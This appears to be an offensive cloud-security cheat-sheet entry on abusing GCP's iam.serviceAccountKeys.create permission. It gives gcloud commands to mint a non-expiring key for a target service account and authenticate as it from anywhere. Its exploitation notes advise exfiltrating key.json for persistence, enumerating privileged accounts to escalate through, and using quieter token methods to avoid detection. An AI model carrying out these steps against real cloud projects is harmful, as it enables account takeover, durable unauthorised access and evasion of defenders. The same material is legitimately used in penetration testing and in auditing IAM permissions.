iam.serviceAccountKeys.create mints a user-managed JSON key for a target service account. Unlike a short-lived impersonation token, the key is long-lived and portable: it is both an immediate takeover of the account and durable persistence that survives password and session changes.
Create and activate a key#
gcloud iam service-accounts keys create key.json \
--iam-account <target>@<proj>.iam.gserviceaccount.com
# authenticate as the target from anywhere
gcloud auth activate-service-account --key-file key.json
gcloud auth print-access-token
Exploitation notes#
- The key never expires by default, so it is a favourite persistence mechanism: exfiltrate
key.jsonand return at will. - Key creation on a privileged SA is a full escalation; enumerate which accounts you can create keys for.
- Noisier than getAccessToken and signJwt because it leaves a key object listed on the account; prefer those when you only need transient access.
Tools#
- gcloud (
iam service-accounts keys create).